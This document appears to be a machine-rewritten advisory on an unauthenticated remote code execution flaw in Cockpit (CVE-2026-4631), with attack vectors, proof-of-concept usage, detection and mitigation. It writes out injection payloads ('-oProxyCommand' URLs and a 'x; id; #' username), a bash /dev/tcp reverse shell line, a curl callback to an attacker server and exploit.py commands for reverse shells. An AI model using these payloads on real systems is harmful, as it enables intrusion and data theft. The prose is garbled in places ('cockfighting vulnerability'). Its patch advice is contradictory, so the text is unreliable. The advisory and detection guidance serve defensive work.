Cockpit SSH argument injection RCE

A security flaw in Cockpit allows an attacker to run arbitrary code on the server without authenticating first. The problem manifests itself through Cockpit's use of SSH arguments in the authentication process.

The Cockpit based remote code execution vulnerability is identified as CVE-2026-4631 and affects all versions of Cockpit from version 327-359. This vulnerability was discovered and reported by intx0x801 by exploring Cockpit's source code.

Cockpit is commonly used as a management system for Linux servers, and it is set to listen on TCP port 9090 for remote management.

How the Vulnerability Works

The Cockpit argument injection based remote code execution vulnerability exists in two different areas: both of these areas are due to how Cockpit builds SSH command strings when a user attempts login.

When Cockpit receives an authentication request, it builds an SSH command string using user-supplied parameters, however, these parameters are not properly sanitized prior to passing these parameters to the system shell. An attacker is able to inject arbitrary SSH command line arguments that are executed using the Cockpit service's privilege level.

Attack Vector One: Hostname ProxyCommand Injection

The first vector of attack in the Cockpit SSH Arguments Injection RCE involves the hostname parameter via the URL. An attacker can use a carefully designed URL such as ${target}/cockpit+=-oProxyCommand=${encoded_cmd}/login, Where the "ProxyCommand" option being passed into the SSH command (via the URL) prior to connecting to the target, instructs the SSH command to execute a command prior to the SSH connection being made.

The Cockpit SSH Argument Injection RCE uses the "ProxyCommand" option to pass an encoded command from the attacker and have that command executed via the ProxyCommand parameter during the SSH connection to the target system. This attack vector is effective with older versions of OpenSSH (prior to version 9.6) and executes the ProxyCommand option server-side.

Attack Vector Two: Username Token Injection

The second attack type of RCE thru SSH Argument Injection in Cockpit is the username element of the Basic Auth Header.

In order to process usernames, Cockpit applies percent-r token replacement. This gives an attacker the ability to inject shell commands and semi-colon characters as part of the user's name.

In the example of Cockpit SSH argument injection RCE exploit, a username payload of x; id; # will terminate the execution of the SSH command being executed, and comment out all additional commands which Cockpit processes.

This means that when Cockpit processes this username, the command that was injected will now execute on the victim user's machine.

The Exploit Features

The Cockpit SSH argument injection RCE proof-of-concept exploit has several capabilities:

1. The attacker can find a potential target for exploitation by issuing a sleep command, such as "sleep 5," and then measuring the duration of time that passes before receiving a response. If the target takes longer than 5 seconds to respond, the attacker may consider it exploitable.

2. The attacker can gain interactive access to the target system using an Internet reverse shell payload (for example, using the command "bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1").

3. DNS callback detection - By executing a curl command to an attacker's DNS server (e.g., "curl http://<attacker controlled sever>/[some page]?ip=$CLIENTIP") an attacker can perform out-of-band DNS callback detection without needing to see the output of the executed command.

4. Window scanning - An attacker could also scan a list of multiple URLs to identify exploitable Cockpit instances at scale.

Affected Versions

There are issues with versions 327-359 of the Cockpit software, which is one of many programs that run on Debian/Linux systems, usually over port 9090.

Users should determine whether they have the affected version of Cockpit and, if so, upgrade as soon as possible to an unaffected version of the software.

Examples of the Exploit Command

Within the Cockpit SSH argument injection RCE exploit, there are many ways to use it:

To test if a target is susceptible by way of time-based detection, use: python exploit.py --target-http://192.168.1.100:9090 --vector username
This sends a sleep 5 command to the target and uses response time to determine if an exploit is possible.

To obtain access via a reverse shell, use: python exploit.py --target http://192.168.1.100:9090 --vector username --lhost 192.168.1.50 --lport 4444
This command will connect back into the attacker's machine on port 4444.

To use DNS callback detection, use: python exploit.py --target http://192.168.1.100:9090 --vector hostname --callback attacker.com
This runs a DNS query against hostname.attacker.com from the target system.

Why This Vulnerability Is Critical

The Cockpit SSH argument injection RCE vulnerability is critical for several reasons:

1. There are no authentication requirements for exploitation since the attacker does not require valid credentials to exploit this issue, allowing any network user that has access to the Cockpit service port to attempt an exploit.

2. Exploitation of the Cockpit SSH argument injection vulnerability gives attackers the capability of remote code execution against the target server, with all commands executing with the privileges of the Cockpit service.

3. The exploitation of this vulnerability is easy and will be successfully executed because the proof-of-concept code functions as documented.

4. Cockpit has a wide attack surface as it is installed on many Linux servers, often in a place where there is potential for access from both local (internal) networks and from the internet.

Detection Methods

The Cockpit SSH Argument Injection RCE vulnerability can be detected by administrators using various means:

1. Log Analysis: Searching your logs for authentication attempts using but not limited to, both unique usernames (ie; with a semicolon, hash mark, or similar command injection format such as x; id; #).

2. URL Monitoring: Monitoring logs or web servers for any requests to URL paths which contain the pattern of ‘cockpit+=-oProxyCommand=" then indicates a potential exploitation of a RCE vulnerability within Cockpit using SSH argument injection methods.

3. TIME-BASED ANOMALIES: When exploiting the vulnerability, the exploitation makes use of "sleep" commands; therefore, the length of time taken for the authentication to respond, in such a way that is outside of the normal response time, is an indicator of an attempted exploitation.

4. Outbound Connections: Once the exploitation has occurred, it is likely that the attacker is going to establish a reverse shell or make DNS callbacks back to their systems; therefore, if an outbound connection is made from the Cockpit server that is unexpected, you should investigate further.

How to Protect Your Cockpit Installation

The Cockpit SSH argument injection RCE vulnerability requires immediate action.

1. Upgrade Cockpit : Check to see if you can upgrade to an updated version of Cockpit that has had knowledge of the Cockpit SSH Argument Injection RCE vulnerability, which is likely fixed in later versions (beyond v.359).

2. Restrict Network Access : If you are unable to upgrade immediately to an updated version of Cockpit, limit access to the Cockpit port (i.e. port number 9090) to only trusted IP Real Addresses because the Cockpit SSH Argument Injection RCE vulnerability will require some sort of network access to exploit it.

3. Utilize a Web Application Firewall (WAF) : A WAF can help identify and block the injection patterns that may be used by the Cockpit SSH Argument Injection RCE vulnerability (e.g., semi-colons in the username or the -o ProxyCommand argument in the URL, etc.).

4. Monitor Logs : The Cockpit SSH Argument Injection RCE vulnerability has been logged in authentication logs. A maintenance routine of active monitoring will help you determine if any attempted exploitation occurred in the logs you have maintained.

5.  Consider Other Remote Management Tools : If you are using the Cockpit RCE vulnerability and have yet to be patched, consider using an alternate remote management solution or disabling Cockpit to manage your servers remotely.

The Vulnerability of the OpenSSH Dependency

The Cockpit SSH argument injection RCE by means of the hostname using the -oProxyCommand SSH option from the available OpenSSH version options to exploit.

Specifically, the ProxyCommand option instructs SSH to run a specified command prior to making the initial connection using the SSH Protocol, and is utilized within the Cockpit SSH argument injection RCE attack to execute arbitrary commands.

In OpenSSH versions prior to 9.6, this method of injection can be performed; later releases of the software are reported as having additional defenses that would prevent this from being done.

Conclusion

The Cockpit SSH argument injection RCE Vulnerability is a significant flaw present within the Cockpit Application that allows an unauthenticated user to execute arbitrary commands through this significant flaw in this generally used server management software.

The exploit is simple to use and reliable, and the Cockpit SSH argument injection RCE proof-of-concept code is publicly available.

If you run Cockpit on any server, check your version today, restrict network access to port 9090, and monitor your logs for signs of exploitation, because attackers are likely scanning for vulnerable Cockpit instances right now.

The Cockpit SSH argument injection RCE vulnerability shows that argument injection flaws in system management tools can lead to full server compromise, and these tools need the same security scrutiny as any other internet-facing service.

FAQ Section

Which Cockpit Versions Are Affected by CVE-2026-4631?

Your cockpits (Version-327 to 359) will be affected by this cockfighting vulnerability. You should update to a patched version past 359.

Does the exploit require an authenticated attacker to exploit it? 

Cockpit's SSH Argument Injection RCE Vulnerabilities do not have authentication requirements. Unauthenticated attackers can exploit both 'Hostname ProxyCommand' vectors as well as 'Username Token Injection' vectors.

What are some things that an exploiter can do? 

An exploiter with Cockpit system privileges can execute any command on the target system from their Cockpit account, including downloading malware, taking files from the compromised server, installing a method for remote access into the server, or using that server to attack other servers.

How does one figure out whether or not my CockPit server was hacked? 

There are multiple ways that could be used to identify a hack or breach of the Cockpit Server. Some of these include: When checking your Event Log files for unusual usernames and in particular if they contain any characters that may be considered to be invalid i.e. ";", "#" this may indicate that the account has been hacked, Reviewing your Log file for any instances of the string "cockpit+=-oProxyCommand=" may also indicate that there has been some unauthorized access, Watching for unusual outbound connections from the Cockpit server or Reverse Shell activity as these may also provide further evidence of possible breaches.

Is there a patch for (CVE-2026-4631)?

The only workaround for this vulnerability is to limit access to your Cockpit server via port 9090 to those IP addresses that you trust. If you haven't checked already, you should find that Cockpit version 360 and above have been released since this vulnerability has been identified, therefore, it would be prudent to apply the most recent updates to Cockpit prior to implementing any changes to port 9090 access.

Source: Exploit DB